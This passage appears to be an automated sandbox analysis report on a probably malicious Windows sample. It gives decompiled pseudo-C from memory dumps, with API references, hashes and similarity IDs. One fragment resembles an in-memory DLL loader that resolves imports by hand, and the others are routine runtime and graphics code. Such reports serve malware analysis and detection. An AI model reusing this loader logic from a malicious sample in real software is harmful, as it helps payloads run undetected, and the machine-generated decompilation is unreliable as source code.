                                                                                                                                                      									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                      								}
                                                                                                                                                      								while(1) {
                                                                                                                                                      									__eflags =  *_v32;
                                                                                                                                                      									if( *_v32 == 0) {
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *_v32 & 0x80000000;
                                                                                                                                                      									if(( *_v32 & 0x80000000) == 0) {
                                                                                                                                                      										_v40 = _v20 +  *_v32;
                                                                                                                                                      										_t88 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      										_t130 = _v40 + 2;
                                                                                                                                                      										__eflags = _t130;
                                                                                                                                                      										_t92 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                      										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
                                                                                                                                                      										_t203 = _t203 + 0xc;
                                                                                                                                                      										 *_v24 = _t132;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t78 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      										_t82 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                      										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
                                                                                                                                                      										_t203 = _t203 + 0xc;
                                                                                                                                                      										 *_v24 = _t137;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags =  *_v24;
                                                                                                                                                      									if( *_v24 != 0) {
                                                                                                                                                      										_v32 =  &(_v32[1]);
                                                                                                                                                      										_t194 = _v24 + 4;
                                                                                                                                                      										__eflags = _t194;
                                                                                                                                                      										_v24 = _t194;
                                                                                                                                                      										continue;
                                                                                                                                                      									} else {
                                                                                                                                                      										_v16 = 0;
                                                                                                                                                      										break;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _v16;
                                                                                                                                                      								if(_v16 != 0) {
                                                                                                                                                      									_t159 = _v8 + 0x14;
                                                                                                                                                      									__eflags = _t159;
                                                                                                                                                      									_v8 = _t159;
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      								_t98 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      								_t101 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                      								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
                                                                                                                                                      								SetLastError(0x7f);
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_t36 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                      							_t39 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                      							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
                                                                                                                                                      							SetLastError(0xe);
                                                                                                                                                      							_v16 = 0;
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						SetLastError(0x7e);
                                                                                                                                                      						_v16 = 0;
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					return _v16;
                                                                                                                                                      				}
                                                                                                                                                      				return 1;
                                                                                                                                                      			}

                                                                                                                                                      0x1001abf4
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad78
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4100373531-0
                                                                                                                                                      • Opcode ID: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction ID: ee799e3b8b260964baacb2eb61f61a8d535858b77694984a1748e2a29b669165
                                                                                                                                                      • Opcode Fuzzy Hash: 59b7c28c5a6a2055bc3ad19a487945ad965c1c3e153a6a88f5d4a819af12ce5d
                                                                                                                                                      • Instruction Fuzzy Hash: ED81A3B4A00209DFDB04CF94D881AAEB7F1FF89355F248158E819AB351D735EA82CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E0040699D(void* __ecx, void* __edx) {
                                                                                                                                                      				void** _v8;
                                                                                                                                                      				struct _STARTUPINFOA _v76;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				signed int* _t48;
                                                                                                                                                      				signed int _t50;
                                                                                                                                                      				long _t55;
                                                                                                                                                      				signed int _t57;
                                                                                                                                                      				signed int _t58;
                                                                                                                                                      				int* _t59;
                                                                                                                                                      				signed char _t63;
                                                                                                                                                      				void** _t67;
                                                                                                                                                      				signed int* _t69;
                                                                                                                                                      				signed int _t72;
                                                                                                                                                      				int* _t73;
                                                                                                                                                      				signed int* _t75;
                                                                                                                                                      				signed int* _t76;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      				void* _t87;
                                                                                                                                                      				int _t88;
                                                                                                                                                      				signed int* _t89;
                                                                                                                                                      				void** _t90;
                                                                                                                                                      				signed int _t91;
                                                                                                                                                      				signed int** _t92;
                                                                                                                                                      
                                                                                                                                                      				_t89 = E00403A89(__ecx, 0x480);
                                                                                                                                                      				_pop(_t75);
                                                                                                                                                      				if(_t89 == 0) {
                                                                                                                                                      					E00403CCB(__edx, _t89);
                                                                                                                                                      					_t75 = 0x1b;
                                                                                                                                                      				}
                                                                                                                                                      				 *0x411d60 = _t89;
                                                                                                                                                      				 *0x411e60 = 0x20;
                                                                                                                                                      				_t1 =  &(_t89[0x120]); // 0x480
                                                                                                                                                      				_t48 = _t1;
                                                                                                                                                      				while(_t89 < _t48) {
                                                                                                                                                      					_t89[1] = _t89[1] & 0x00000000;
                                                                                                                                                      					 *_t89 =  *_t89 | 0xffffffff;
                                                                                                                                                      					_t89[2] = _t89[2] & 0x00000000;
                                                                                                                                                      					_t89[1] = 0xa;
                                                                                                                                                      					_t89 =  &(_t89[9]);
                                                                                                                                                      					_t48 =  &(( *0x411d60)[0x120]);
                                                                                                                                                      				}
                                                                                                                                                      				GetStartupInfoA( &_v76);
                                                                                                                                                      				if(_v76.cbReserved2 == 0) {
                                                                                                                                                      					L25:
                                                                                                                                                      					_t72 = 0;
                                                                                                                                                      					do {
                                                                                                                                                      						_t76 =  *0x411d60;
                                                                                                                                                      						_t50 = _t72 + _t72 * 8;
                                                                                                                                                      						_t90 =  &(_t76[_t50]);
                                                                                                                                                      						if(_t76[_t50] != 0xffffffff) {
                                                                                                                                                      							_t90[1] = _t90[1] | 0x00000080;
                                                                                                                                                      							goto L37;
                                                                                                                                                      						}
                                                                                                                                                      						_t90[1] = 0x81;
                                                                                                                                                      						if(_t72 != 0) {
                                                                                                                                                      							asm("sbb eax, eax");
                                                                                                                                                      							_t55 =  ~(_t72 - 1) + 0xfffffff5;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t55 = 0xfffffff6;
                                                                                                                                                      						}
                                                                                                                                                      						_t87 = GetStdHandle(_t55);
                                                                                                                                                      						if(_t87 == 0xffffffff) {
                                                                                                                                                      							L33:
                                                                                                                                                      							_t90[1] = _t90[1] | 0x00000040;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t57 = GetFileType(_t87);
                                                                                                                                                      							if(_t57 == 0) {
                                                                                                                                                      								goto L33;
                                                                                                                                                      							}
                                                                                                                                                      							_t58 = _t57 & 0x000000ff;
                                                                                                                                                      							 *_t90 = _t87;
                                                                                                                                                      							if(_t58 != 2) {
                                                                                                                                                      								if(_t58 == 3) {
                                                                                                                                                      									_t90[1] = _t90[1] | 0x00000008;
                                                                                                                                                      								}
                                                                                                                                                      								goto L37;
                                                                                                                                                      							}
                                                                                                                                                      							goto L33;
                                                                                                                                                      						}
                                                                                                                                                      						L37:
                                                                                                                                                      						_t72 = _t72 + 1;
                                                                                                                                                      					} while (_t72 < 3);
                                                                                                                                                      					return SetHandleCount( *0x411e60);
                                                                                                                                                      				}
                                                                                                                                                      				_t59 = _v76.lpReserved2;
                                                                                                                                                      				if(_t59 == 0) {
                                                                                                                                                      					goto L25;
                                                                                                                                                      				}
                                                                                                                                                      				_t88 =  *_t59;
                                                                                                                                                      				_t73 =  &(_t59[1]);
                                                                                                                                                      				_v8 = _t73 + _t88;
                                                                                                                                                      				if(_t88 >= 0x800) {
                                                                                                                                                      					_t88 = 0x800;
                                                                                                                                                      				}
                                                                                                                                                      				if( *0x411e60 >= _t88) {
                                                                                                                                                      					L18:
                                                                                                                                                      					_t91 = 0;
                                                                                                                                                      					if(_t88 <= 0) {
                                                                                                                                                      						goto L25;
                                                                                                                                                      					} else {
                                                                                                                                                      						goto L19;
                                                                                                                                                      					}
                                                                                                                                                      					do {
                                                                                                                                                      						L19:
                                                                                                                                                      						_t77 =  *_v8;
                                                                                                                                                      						if(_t77 != 0xffffffff) {
                                                                                                                                                      							_t63 =  *_t73;
                                                                                                                                                      							if((_t63 & 0x00000001) != 0 && ((_t63 & 0x00000008) != 0 || GetFileType(_t77) != 0)) {
                                                                                                                                                      								_t67 =  &(0x411d60[_t91 >> 5][(_t91 & 0x0000001f) + (_t91 & 0x0000001f) * 8]);
                                                                                                                                                      								 *_t67 =  *_v8;
                                                                                                                                                      								_t67[1] =  *_t73;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						_v8 =  &(_v8[1]);
                                                                                                                                                      						_t91 = _t91 + 1;
                                                                                                                                                      						_t73 =  &(_t73[0]);
                                                                                                                                                      					} while (_t91 < _t88);
                                                                                                                                                      					goto L25;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t92 = 0x411d64;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t69 = E00403A89(_t75, 0x480);
                                                                                                                                                      						if(_t69 == 0) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						 *0x411e60 =  *0x411e60 + 0x20;
                                                                                                                                                      						 *_t92 = _t69;
                                                                                                                                                      						_t13 =  &(_t69[0x120]); // 0x480
                                                                                                                                                      						_t75 = _t13;
                                                                                                                                                      						while(_t69 < _t75) {
                                                                                                                                                      							_t69[1] = _t69[1] & 0x00000000;
                                                                                                                                                      							 *_t69 =  *_t69 | 0xffffffff;
                                                                                                                                                      							_t69[2] = _t69[2] & 0x00000000;
                                                                                                                                                      							_t69[1] = 0xa;
                                                                                                                                                      							_t69 =  &(_t69[9]);
                                                                                                                                                      							_t75 =  &(( *_t92)[0x120]);
                                                                                                                                                      						}
                                                                                                                                                      						_t92 =  &(_t92[1]);
                                                                                                                                                      						if( *0x411e60 < _t88) {
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						goto L18;
                                                                                                                                                      					}
                                                                                                                                                      					_t88 =  *0x411e60;
                                                                                                                                                      					goto L18;
                                                                                                                                                      				}
                                                                                                                                                      			}



























                                                                                                                                                      APIs
                                                                                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 004069FB
                                                                                                                                                      • GetFileType.KERNEL32 ref: 00406AA6
                                                                                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00406B09
                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00406B17
                                                                                                                                                      • SetHandleCount.KERNEL32 ref: 00406B4E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1710529072-0
                                                                                                                                                      • Opcode ID: 74009096f38d183468f150023b426213cf9e98497bee2906fb391ec2abd2d0b2
                                                                                                                                                      • Instruction ID: bcaf39db347c1d90c7623712de0f61de606629f51fcdf8990e7f052139674f4e
                                                                                                                                                      • Opcode Fuzzy Hash: 74009096f38d183468f150023b426213cf9e98497bee2906fb391ec2abd2d0b2
                                                                                                                                                      • Instruction Fuzzy Hash: F45106716042258FC720DF68C8846667BF0EB02368F26867ED9A3F72E1D7789815CB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403280(int* _a4, int _a8, int* _a12) {
                                                                                                                                                      				intOrPtr _v4;
                                                                                                                                                      				int _v188;
                                                                                                                                                      				intOrPtr _v324;
                                                                                                                                                      				intOrPtr _v340;
                                                                                                                                                      				void _v344;
                                                                                                                                                      				int _t15;
                                                                                                                                                      				int _t16;
                                                                                                                                                      				int* _t18;
                                                                                                                                                      				int* _t19;
                                                                                                                                                      				int _t21;
                                                                                                                                                      				int* _t28;
                                                                                                                                                      				int* _t29;
                                                                                                                                                      				int* _t30;
                                                                                                                                                      
                                                                                                                                                      				_v344 = 0x158;
                                                                                                                                                      				if(SystemParametersInfoA(0x29, 0x158,  &_v344, 0) == 0) {
                                                                                                                                                      					_t15 = GetSystemMetrics(0x5c);
                                                                                                                                                      					_t28 = _a12;
                                                                                                                                                      					_t21 = _t15;
                                                                                                                                                      					if(_t28 != 0) {
                                                                                                                                                      						_t15 = GetSystemMetrics(0xf);
                                                                                                                                                      						 *_t28 = _t15;
                                                                                                                                                      					}
                                                                                                                                                      					_t29 = _a4;
                                                                                                                                                      					if(_t29 != 0) {
                                                                                                                                                      						_t15 = GetSystemMetrics(7) + _t21;
                                                                                                                                                      						 *_t29 = _t15;
                                                                                                                                                      					}
                                                                                                                                                      					_t30 = _a8;
                                                                                                                                                      					if(_t30 != 0) {
                                                                                                                                                      						_t16 = GetSystemMetrics(4);
                                                                                                                                                      						 *_t30 = _t16;
                                                                                                                                                      						return _t16;
                                                                                                                                                      					}
                                                                                                                                                      					goto L13;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t18 = _a12;
                                                                                                                                                      					if(_t18 != 0) {
                                                                                                                                                      						 *_t18 = _v188;
                                                                                                                                                      					}
                                                                                                                                                      					_t19 = _a4;
                                                                                                                                                      					if(_t19 != 0) {
                                                                                                                                                      						 *_t19 = _v340 + _v4;
                                                                                                                                                      					}
                                                                                                                                                      					_t15 = _a8;
                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                      						L13:
                                                                                                                                                      						return _t15;
                                                                                                                                                      					} else {
                                                                                                                                                      						 *_t15 = _v324;
                                                                                                                                                      						return _t15;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      			}

















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3136151823-0
                                                                                                                                                      • Opcode ID: 399c20f0005a25461aa70f262010debf80290863208646817f723a6a16c89255
                                                                                                                                                      • Instruction ID: 4f0a499fe05242b0b8db50700348c8926cdac99036846cfd25217758564b63bb
                                                                                                                                                      • Opcode Fuzzy Hash: 399c20f0005a25461aa70f262010debf80290863208646817f723a6a16c89255
                                                                                                                                                      • Instruction Fuzzy Hash: CF114C35308741DFE3209F59DC80BEBBBE8AFC4751F14442AA988AB380DB7598048B96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t25;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      				void* _t46;
                                                                                                                                                      
                                                                                                                                                      				_t38 = __edi;
                                                                                                                                                      				_t30 = __ebx;
                                                                                                                                                      				_t17 = E1000CAC0(_a4);
                                                                                                                                                      				_t18 = E1000CAC0(_a8);
                                                                                                                                                      				_t44 = _t42 + 8;
                                                                                                                                                      				if(_t17 >= _t18) {
                                                                                                                                                      					_v8 = _a4;
                                                                                                                                                      					_v12 = 0;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t19 = E1000CAC0(_a8);
                                                                                                                                                      						_t21 = E1000CAC0(_a4);
                                                                                                                                                      						_t46 = _t44 + 8;
                                                                                                                                                      						if(_t19 + _v12 > _t21) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
                                                                                                                                                      						_t44 = _t46 + 0x10;
                                                                                                                                                      						if(_t25 != 0) {
                                                                                                                                                      							_v12 = _v12 + 1;
                                                                                                                                                      							_v8 = _v8 + 1;
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				return 0;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
                                                                                                                                                      • Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t23;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      				void* _t28;
                                                                                                                                                      				void* _t36;
                                                                                                                                                      				void* _t40;
                                                                                                                                                      				void* _t42;
                                                                                                                                                      				void* _t44;
                                                                                                                                                      
                                                                                                                                                      				_t36 = __edi;
                                                                                                                                                      				_t28 = __ebx;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				if(_a4 != 0 && _a8 != 0) {
                                                                                                                                                      					_t20 = E1000CAC0(_a4);
                                                                                                                                                      					_t21 = E1000CAC0(_a8);
                                                                                                                                                      					_t42 = _t40 + 8;
                                                                                                                                                      					if(_t20 >= _t21) {
                                                                                                                                                      						_v12 = 0;
                                                                                                                                                      						while(1) {
                                                                                                                                                      							_t23 = E1000CAC0(_a4);
                                                                                                                                                      							_t24 = E1000CAC0(_a8);
                                                                                                                                                      							_t44 = _t42 + 8;
                                                                                                                                                      							if(_v12 >= _t23 - _t24) {
                                                                                                                                                      								goto L9;
                                                                                                                                                      							}
                                                                                                                                                      							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
                                                                                                                                                      							_t42 = _t44 + 0x10;
                                                                                                                                                      							if(_t27 != 0) {
                                                                                                                                                      								_v12 = _v12 + 1;
                                                                                                                                                      								continue;
                                                                                                                                                      							} else {
                                                                                                                                                      								_v8 = 1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L9;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L9:
                                                                                                                                                      				return _v8;
                                                                                                                                                      			}
















                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
                                                                                                                                                      • Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401250(intOrPtr _a4) {
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				void* _t16;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                      
                                                                                                                                                      				_t29 = _a4;
                                                                                                                                                      				_t14 =  *((intOrPtr*)(_t29 + 0x2c));
                                                                                                                                                      				if( *((intOrPtr*)(_t29 + 0x2c)) != 0) {
                                                                                                                                                      					E00403650(_t14);
                                                                                                                                                      					 *((intOrPtr*)(_t29 + 0x2c)) = 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t15 =  *(_t29 + 0xc);
                                                                                                                                                      				if(_t15 != 0) {
                                                                                                                                                      					DeleteObject(_t15);
                                                                                                                                                      				}
                                                                                                                                                      				_t16 =  *(_t29 + 0x18);
                                                                                                                                                      				 *(_t29 + 0xc) = 0;
                                                                                                                                                      				if(_t16 != 0) {
                                                                                                                                                      					DeleteObject(_t16);
                                                                                                                                                      				}
                                                                                                                                                      				_t17 =  *(_t29 + 0x1c);
                                                                                                                                                      				 *(_t29 + 0x18) = 0;
                                                                                                                                                      				if(_t17 != 0) {
                                                                                                                                                      					DeleteObject(_t17);
                                                                                                                                                      				}
                                                                                                                                                      				_t18 =  *(_t29 + 0x20);
                                                                                                                                                      				 *(_t29 + 0x1c) = 0;
                                                                                                                                                      				if(_t18 != 0) {
                                                                                                                                                      					DeleteObject(_t18);
                                                                                                                                                      				}
                                                                                                                                                      				_t19 =  *(_t29 + 0x24);
                                                                                                                                                      				 *(_t29 + 0x20) = 0;
                                                                                                                                                      				if(_t19 != 0) {
                                                                                                                                                      					DeleteObject(_t19);
                                                                                                                                                      				}
                                                                                                                                                      				 *(_t29 + 0x24) = 0;
                                                                                                                                                      				return 0;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040127A
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401287
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401294
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004012A1
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004012AE
                                                                                                                                                        • Part of subcall function 00403650: CloseHandle.KERNEL32(?,00401266,?), ref: 00403659
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeleteObject$CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4038695863-0
                                                                                                                                                      • Opcode ID: b5e570a17f1e940c12e593b2320b66470befd8047a5ea254375dc817615700be
                                                                                                                                                      • Instruction ID: 8bf31a696b1b558d097ec00c0e5610933454923f565c7d704a328e82ec1086a0
                                                                                                                                                      • Opcode Fuzzy Hash: b5e570a17f1e940c12e593b2320b66470befd8047a5ea254375dc817615700be
                                                                                                                                                      • Instruction Fuzzy Hash: 6801ACB5A00B009FC631DF6ADC84817F7E9BB887503644E6EE489E3751D639E8458B68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401330(void* _a4, int _a8, int _a12, int _a16, int _a20) {
                                                                                                                                                      				int _v0;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				struct HDC__* _t22;
                                                                                                                                                      				struct HDC__* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t22 = _a4;
                                                                                                                                                      				_t23 = CreateCompatibleDC(_t22);
                                                                                                                                                      				_t11 = SelectObject(_t23, _a4);
                                                                                                                                                      				BitBlt(_t22, _v0, _a4, _a16, _a20, _t23, _a8, _a12, 0xcc0020);
                                                                                                                                                      				SelectObject(_t23, _t11);
                                                                                                                                                      				return DeleteDC(_t23);
                                                                                                                                                      			}








                                                                                                                                                      APIs
                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00401339
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040134D
                                                                                                                                                      • BitBlt.GDI32(?,?,?,?,?,00000000,?,?,00CC0020), ref: 00401376
                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0040137E
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00401381
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDelete
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 488333989-0
                                                                                                                                                      • Opcode ID: fdb27461bc161449168f726a47084b6a473ccc3699775058bb529457060b94c2
